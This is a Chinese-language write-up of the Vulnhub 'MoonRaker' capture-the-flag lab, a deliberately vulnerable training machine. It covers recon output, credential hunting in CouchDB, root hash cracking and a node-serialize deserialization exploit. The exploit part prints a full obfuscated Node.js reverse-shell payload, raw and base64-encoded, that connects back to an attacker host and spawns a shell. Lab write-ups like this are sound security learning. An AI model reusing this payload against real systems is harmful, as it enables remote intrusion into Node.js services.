2019-01-23-Vulnhub渗透测试实战writeup(17)

MoonRaker....选这个因为封面蛮好看地....大长腿....访问80端口还有视频出现


p1

nmap结果:

# Nmap 7.40 scan initiated Tue Jan 22 21:47:44 2019 as: nmap -p- -A -sV -Pn -oN 1.xml 192.168.110.143
Nmap scan report for 192.168.110.143
Host is up (0.0012s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey: 
|   2048 5f:bf:c0:33:51:4f:4a:a7:4a:7e:15:80:aa:d7:2a:0b (RSA)
|_  256 53:59:87:1e:a4:46:bd:a7:fd:9a:5f:f9:b7:40:9d:2f (ECDSA)
80/tcp    open  http     Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: MOONRAKER
3000/tcp  open  http     Node.js Express framework
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=401
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
4369/tcp  open  epmd     Erlang Port Mapper Daemon
| epmd-info: 
|   epmd_port: 4369
|   nodes: 
|_    couchdb: 42665
5984/tcp  open  couchdb?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Object Not Found
|     Cache-Control: must-revalidate
|     Connection: close
|     Content-Length: 58
|     Content-Type: application/json
|     Date: Wed, 23 Jan 2019 10:49:14 GMT
|     Server: CouchDB/2.2.0 (Erlang OTP/19)
|     X-Couch-Request-ID: a2af5cdd93
|     X-CouchDB-Body-Time: 0
|     {"error":"not_found","reason":"Database does not exist."}
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: must-revalidate
|     Connection: close
|     Content-Length: 164
|     Content-Type: application/json
|     Date: Wed, 23 Jan 2019 10:48:22 GMT
|     Server: CouchDB/2.2.0 (Erlang OTP/19)
|     X-Couch-Request-ID: 8ff88fda87
|     X-CouchDB-Body-Time: 0
|     {"couchdb":"Welcome","version":"2.2.0","git_sha":"2a16ec4","features":["pluggable-storage-engines","scheduler"],"vendor":{"name":"The Apache Software Foundation"}}
|   HTTPOptions: 
|     HTTP/1.0 500 Internal Server Error
|     Cache-Control: must-revalidate
|     Connection: close
|     Content-Length: 61
|     Content-Type: application/json
|     Date: Wed, 23 Jan 2019 10:48:22 GMT
|     Server: CouchDB/2.2.0 (Erlang OTP/19)
|     X-Couch-Request-ID: e1640da16c
|     X-Couch-Stack-Hash: 1828508689
|     X-CouchDB-Body-Time: 0
|_    {"error":"unknown_error","reason":"badarg","ref":1828508689}
42665/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5984-TCP:V=7.40%I=7%D=1/22%Time=5C47D5F6%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,1A3,"HTTP/1\.0\x20200\x20OK\r\nCache-Control:\x20must-revalida
SF:te\r\nConnection:\x20close\r\nContent-Length:\x20164\r\nContent-Type:\x
SF:20application/json\r\nDate:\x20Wed,\x2023\x20Jan\x202019\x2010:48:22\x2
SF:0GMT\r\nServer:\x20CouchDB/2\.2\.0\x20\(Erlang\x20OTP/19\)\r\nX-Couch-R
SF:equest-ID:\x208ff88fda87\r\nX-CouchDB-Body-Time:\x200\r\n\r\n{\"couchdb
SF:\":\"Welcome\",\"version\":\"2\.2\.0\",\"git_sha\":\"2a16ec4\",\"featur
SF:es\":\[\"pluggable-storage-engines\",\"scheduler\"\],\"vendor\":{\"name
SF:\":\"The\x20Apache\x20Software\x20Foundation\"}}\n")%r(HTTPOptions,16E,
SF:"HTTP/1\.0\x20500\x20Internal\x20Server\x20Error\r\nCache-Control:\x20m
SF:ust-revalidate\r\nConnection:\x20close\r\nContent-Length:\x2061\r\nCont
SF:ent-Type:\x20application/json\r\nDate:\x20Wed,\x2023\x20Jan\x202019\x20
SF:10:48:22\x20GMT\r\nServer:\x20CouchDB/2\.2\.0\x20\(Erlang\x20OTP/19\)\r
SF:\nX-Couch-Request-ID:\x20e1640da16c\r\nX-Couch-Stack-Hash:\x20182850868
SF:9\r\nX-CouchDB-Body-Time:\x200\r\n\r\n{\"error\":\"unknown_error\",\"re
SF:ason\":\"badarg\",\"ref\":1828508689}\n")%r(FourOhFourRequest,146,"HTTP
SF:/1\.0\x20404\x20Object\x20Not\x20Found\r\nCache-Control:\x20must-revali
SF:date\r\nConnection:\x20close\r\nContent-Length:\x2058\r\nContent-Type:\
SF:x20application/json\r\nDate:\x20Wed,\x2023\x20Jan\x202019\x2010:49:14\x
SF:20GMT\r\nServer:\x20CouchDB/2\.2\.0\x20\(Erlang\x20OTP/19\)\r\nX-Couch-
SF:Request-ID:\x20a2af5cdd93\r\nX-CouchDB-Body-Time:\x200\r\n\r\n{\"error\
SF:":\"not_found\",\"reason\":\"Database\x20does\x20not\x20exist\.\"}\n");
MAC Address: 00:0C:29:85:81:B5 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT     ADDRESS
1   1.17 ms 192.168.110.143
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 22 21:50:27 2019 -- 1 IP address (1 host up) scanned in 163.82 seconds

dirb啥都没发现.....


-----------------
DIRB v2.22    
By The Dark Raver
-----------------

OUTPUT_FILE: result.txt
START_TIME: Tue Jan 22 21:59:27 2019
URL_BASE: http://192.168.110.143/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.110.143/ ----
==> DIRECTORY: http://192.168.110.143/accounting/
==> DIRECTORY: http://192.168.110.143/cats/
+ http://192.168.110.143/index.html (CODE:200|SIZE:422)
+ http://192.168.110.143/robots.txt (CODE:200|SIZE:26)
+ http://192.168.110.143/server-status (CODE:403|SIZE:303)
==> DIRECTORY: http://192.168.110.143/services/

---- Entering directory: http://192.168.110.143/accounting/ ----
+ http://192.168.110.143/accounting/index.php (CODE:200|SIZE:55)

---- Entering directory: http://192.168.110.143/cats/ ----

---- Entering directory: http://192.168.110.143/services/ ----
+ http://192.168.110.143/services/index.html (CODE:200|SIZE:1756)

-----------------
END_TIME: Tue Jan 22 21:59:55 2019
DOWNLOADED: 18448 - FOUND: 5

最后看了很久的主机漏洞都没啥发现,web只找到一个xss,但是又没有cookie搞毛...
看了walkthrough发现是直接使用一招,他们在service那里有一个留言板(其实就是把输入的内容写入log里面,但是我们不知道到底是写入那里的文件名以及文件路径是什么),所以开了个apache,然后让target下载下来查看access的日志就可以看到了.


p2

然后直接就知道是哪个文件处理的了,直接访问他...这一招学起了,以后可以骚一把

http://192.168.110.143/svc-inq/salesmoon-gui.php

这个页面有两个需要注意的地方,一个是hugo.txt,页面内容如下:

FYI Hugo's custom page is being rebuilt over on the NodeJS server running on port 3000. Here's a snippet of the backend code for cookie input..this is once you get past the Username/password prompt.

The dev team is still creating most of the front end, but we will have to "secure the code" since we're now not only tasked with sales, but also secure code review. How do they expect to offer all of these extra services without hiring more ppl? Never thought I'd be a nerdy "coder"!

Here's the snippet, you'll need nodejs and other stuff to run. It looks good to me so I've pushed to prod...

//Stuff to import
var express = require('express');
var cookieParser = require('cookie-parser');
var escape = require('escape-html');
var serialize = require('node-serialize');
var app = express();

// Here's the function they want reviewed...
// I think it decodes the weird cookie string and runs it, prints it, sets it or idk.

app.get('/', function(req, res) {
     if (req.cookies.profile) {
        var str = new Buffer(req.cookies.profile, 'base64').toString();
        var obj = serialize.unserialize(str);
            if (obj.username) {
                     res.send("Stuff here then print out username.. " + escape(obj.username)");
                          }
          } else {
                 res.cookie('profile', "eyJ1c2VybmFtZSI6Imh1Z28ifQ==", {
                 maxAge: 900000,
                         httpOnly: true
                        });
           }
});
app.listen(3000);

不太能看懂js的短板还是要补起来的.....但是这里的主要还是要看cookie那里的参数.
另一个要注意的页面是http://192.168.110.143/svc-inq/couchnotes.txt,内容如下:

--Our new devs are building a front end to work with CouchDB backend. For now most data collection needs to be done manually.

--For you new sales folks, using curl to interact with couch is slick. Otherwise the front end admin panel is available.
-----Contact me in office if you'd like a user created.

--Quick path to check for DB's created, then you can dive into each if you have permissions.
/_all_dbs
------------For Jaws' eye's only below the line------------------
--my password
hint: girlfriends name + "x99" w/o quotes

这里提示了couchdb的用户名是jaws,密码是


p3

那就是Dollyx99了,有了账号密码但是没有couchdb的登录界面怎么办?那就找找建站模板了...
如下:

http://192.168.110.143:5984/_utils/#login

进来以后发现3个库,只有link一个才可以访问...其他两个没啥权限


p4

然后直接打开Link发现四个连接:

/cats/cats-gallery.html#前面猫的那个
/surv-cam/recent.html#这个点进去,好好看......不多说
/HR-Confidential/offer-letters.html#这个进去有东西
/x-files/deep-space-findings.html#这个进去以后没发现啥玩意

第三个连接进去是这样的...

p5

结合前面看到的界面,这里需要先看下hugo用户,果然看到了些啥
p6

p7

这里有个账号密码,前面nmap扫描以后有发现一个Node.js Express framework就是需要账号密码来登录的,这里应该就是了...尝试一下成功了...
p8

这里的node.js存在一个反序列化漏洞,可以直接getshell,先放一个参考文章
https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
p9

根据参考文章,反序列化字段应该是在cookie字段,profile那里,所以我们需要截取报文再生成payload来getshell,因此前面获取的账号密码意义就在这里了.
截获的报文如下:

GET / HTTP/1.1
Host: 192.168.110.143:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: AuthSession=amF3czo1QzQ5RUFCRjqL4fuwv3GwQ70_iK99c_oPA_8RCw; profile=eyJ1c2VybmFtZSI6Imh1Z28ifQ%3D%3D
Authorization: Basic aHVnbzpUZW1wbGVMYXNlcnNMMks=
Connection: keep-alive
If-None-Match: W/"5c-Hu0fOrq4gpzRr1hphtyepFR+674"
Cache-Control: max-age=0

cookie处进行了base64编码
python脚本地址:https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py
然后过程如下:

python test.py 192.168.110.128 7777
生成的payload再加上头尾格式如下:
{"rce":"_$$ND_FUNC$$_function (){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,49,49,48,46,49,50,56,34,59,10,80,79,82,84,61,34,55,55,55,55,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}()"}
然后直接使用进行base64编码payload如下:
CnsicmNlIjoiXyQkTkRfRlVOQyQkX2Z1bmN0aW9uICgpe2V2YWwoU3RyaW5nLmZyb21DaGFyQ29kZSgxMCwxMTgsOTcsMTE0LDMyLDExMCwxMDEsMTE2LDMyLDYxLDMyLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSwxMTAsMTAxLDExNiwzOSw0MSw1OSwxMCwxMTgsOTcsMTE0LDMyLDExNSwxMTIsOTcsMTE5LDExMCwzMiw2MSwzMiwxMTQsMTAxLDExMywxMTcsMTA1LDExNCwxMDEsNDAsMzksOTksMTA0LDEwNSwxMDgsMTAwLDk1LDExMiwxMTQsMTExLDk5LDEwMSwxMTUsMTE1LDM5LDQxLDQ2LDExNSwxMTIsOTcsMTE5LDExMCw1OSwxMCw3Miw3OSw4Myw4NCw2MSwzNCw0OSw1Nyw1MCw0Niw0OSw1NCw1Niw0Niw0OSw0OSw0OCw0Niw0OSw1MCw1NiwzNCw1OSwxMCw4MCw3OSw4Miw4NCw2MSwzNCw1NSw1NSw1NSw1NSwzNCw1OSwxMCw4NCw3Myw3Nyw2OSw3OSw4NSw4NCw2MSwzNCw1Myw0OCw0OCw0OCwzNCw1OSwxMCwxMDUsMTAyLDMyLDQwLDExNiwxMjEsMTEyLDEwMSwxMTEsMTAyLDMyLDgzLDExNiwxMTQsMTA1LDExMCwxMDMsNDYsMTEyLDExNCwxMTEsMTE2LDExMSwxMTYsMTIxLDExMiwxMDEsNDYsOTksMTExLDExMCwxMTYsOTcsMTA1LDExMCwxMTUsMzIsNjEsNjEsNjEsMzIsMzksMTE3LDExMCwxMDAsMTAxLDEwMiwxMDUsMTEwLDEwMSwxMDAsMzksNDEsMzIsMTIzLDMyLDgzLDExNiwxMTQsMTA1LDExMCwxMDMsNDYsMTEyLDExNCwxMTEsMTE2LDExMSwxMTYsMTIxLDExMiwxMDEsNDYsOTksMTExLDExMCwxMTYsOTcsMTA1LDExMCwxMTUsMzIsNjEsMzIsMTAyLDExNywxMTAsOTksMTE2LDEwNSwxMTEsMTEwLDQwLDEwNSwxMTYsNDEsMzIsMTIzLDMyLDExNCwxMDEsMTE2LDExNywxMTQsMTEwLDMyLDExNiwxMDQsMTA1LDExNSw0NiwxMDUsMTEwLDEwMCwxMDEsMTIwLDc5LDEwMiw0MCwxMDUsMTE2LDQxLDMyLDMzLDYxLDMyLDQ1LDQ5LDU5LDMyLDEyNSw1OSwzMiwxMjUsMTAsMTAyLDExNywxMTAsOTksMTE2LDEwNSwxMTEsMTEwLDMyLDk5LDQwLDcyLDc5LDgzLDg0LDQ0LDgwLDc5LDgyLDg0LDQxLDMyLDEyMywxMCwzMiwzMiwzMiwzMiwxMTgsOTcsMTE0LDMyLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsMzIsNjEsMzIsMTEwLDEwMSwxMTksMzIsMTEwLDEwMSwxMTYsNDYsODMsMTExLDk5LDEwNywxMDEsMTE2LDQwLDQxLDU5LDEwLDMyLDMyLDMyLDMyLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDYsOTksMTExLDExMCwxMTAsMTAxLDk5LDExNiw0MCw4MCw3OSw4Miw4NCw0NCwzMiw3Miw3OSw4Myw4NCw0NCwzMiwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsNDAsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExOCw5NywxMTQsMzIsMTE1LDEwNCwzMiw2MSwzMiwxMTUsMTEyLDk3LDExOSwxMTAsNDAsMzksNDcsOTgsMTA1LDExMCw0NywxMTUsMTA0LDM5LDQ0LDkxLDkzLDQxLDU5LDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDYsMTE5LDExNCwxMDUsMTE2LDEwMSw0MCwzNCw2NywxMTEsMTEwLDExMCwxMDEsOTksMTE2LDEwMSwxMDAsMzMsOTIsMTEwLDM0LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDYsMTEyLDEwNSwxMTIsMTAxLDQwLDExNSwxMDQsNDYsMTE1LDExNiwxMDAsMTA1LDExMCw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMTUsMTA0LDQ2LDExNSwxMTYsMTAwLDExMSwxMTcsMTE2LDQ2LDExMiwxMDUsMTEyLDEwMSw0MCw5OSwxMDgsMTA1LDEwMSwxMTAsMTE2LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDQsNDYsMTE1LDExNiwxMDAsMTAxLDExNCwxMTQsNDYsMTEyLDEwNSwxMTIsMTAxLDQwLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE1LDEwNCw0NiwxMTEsMTEwLDQwLDM5LDEwMSwxMjAsMTA1LDExNiwzOSw0NCwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsNDAsOTksMTExLDEwMCwxMDEsNDQsMTE1LDEwNSwxMDMsMTEwLDk3LDEwOCw0MSwxMjMsMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMDEsMTEwLDEwMCw0MCwzNCw2OCwxMDUsMTE1LDk5LDExMSwxMTAsMTEwLDEwMSw5OSwxMTYsMTAxLDEwMCwzMyw5MiwxMTAsMzQsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTI1LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDEyNSw0MSw1OSwxMCwzMiwzMiwzMiwzMiw5OSwxMDgsMTA1LDEwMSwxMTAsMTE2LDQ2LDExMSwxMTAsNDAsMzksMTAxLDExNCwxMTQsMTExLDExNCwzOSw0NCwzMiwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsNDAsMTAxLDQxLDMyLDEyMywxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMTUsMTAxLDExNiw4NCwxMDUsMTA5LDEwMSwxMTEsMTE3LDExNiw0MCw5OSw0MCw3Miw3OSw4Myw4NCw0NCw4MCw3OSw4Miw4NCw0MSw0NCwzMiw4NCw3Myw3Nyw2OSw3OSw4NSw4NCw0MSw1OSwxMCwzMiwzMiwzMiwzMiwxMjUsNDEsNTksMTAsMTI1LDEwLDk5LDQwLDcyLDc5LDgzLDg0LDQ0LDgwLDc5LDgyLDg0LDQxLDU5LDEwKSl9KCkifQ==
p10

然后就可以直接反弹回来了,不是交互shell,还需要一波python
反弹shell回来以后一波测试,发现没有所谓的写权限,所以dirtycow凉凉,其次之前提示有定期清理那个log的存在,猜测是uuid提权有望,尝试一波发现无法写...
然后就只能尝试一波那个找配置文件了,直接找到couchdb目录...查看local.ini文件


p11

发现hugo账号密码,尝试su hugo一波成功了
来到这一步就卡壳了2333没办法了看walkthrough说作者留了和hint在mail里面,这种正常肯定看不到的啊....


p12

p13

给了一个密码哈希,说是要加上VR00M
这里学一波kali中的hash破解工具john,直接把hash存储在文件中,然后john+文件名
p14

那就直接密码cyberVR00M了
p15

base64解码后是:
was dolly wearing braces?
总结:
这次果然证明了,我的技巧在chanllenge难度面前还是不够的....
首先是利用一个xss,利用反向下载的技巧获取当前的日志处理文件名称和路径
接着直接访问,获取数据库的访问之后获取到nodejs的账号密码,接着利用一个反序列化漏洞直接getshell,之后查看配置文件获取hugo的登录bash,最后再查看mail获取root密码hash,破解之后直接登录.

©著作权归作者所有,转载或内容合作请联系作者
  • 人面猴
    序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 220,295评论 6 512
  • 死咒
    序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 93,928评论 3 396
  • 救了他两次的神仙让他今天三更去死
    文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 166,682评论 0 357
  • 道士缉凶录:失踪的卖姜人
    文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 59,209评论 1 295
  • 港岛之恋(遗憾婚礼)
    正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 68,237评论 6 397
  • 恶毒庶女顶嫁案:这布局不是一般人想出来的
    文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,965评论 1 308
  • 城市分裂传说
    那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,586评论 3 420
  • 双鸳鸯连环套:你想象不到人心有多黑
    文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,487评论 0 276
  • 万荣杀人案实录
    序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 46,016评论 1 319
  • 护林员之死
    正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 38,136评论 3 340
  • 白月光启示录
    正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 40,271评论 1 352
  • 活死人
    序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,948评论 5 347
  • 日本核电站爆炸内幕
    正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,619评论 3 331
  • 男人毒药:我在死后第九天来索命
    文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 32,139评论 0 23
  • 一桩弑父案,背后竟有这般阴谋
    文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 33,252评论 1 272
  • 情欲美人皮
    我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 48,598评论 3 375
  • 代替公主和亲
    正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 45,267评论 2 358

推荐阅读更多精彩内容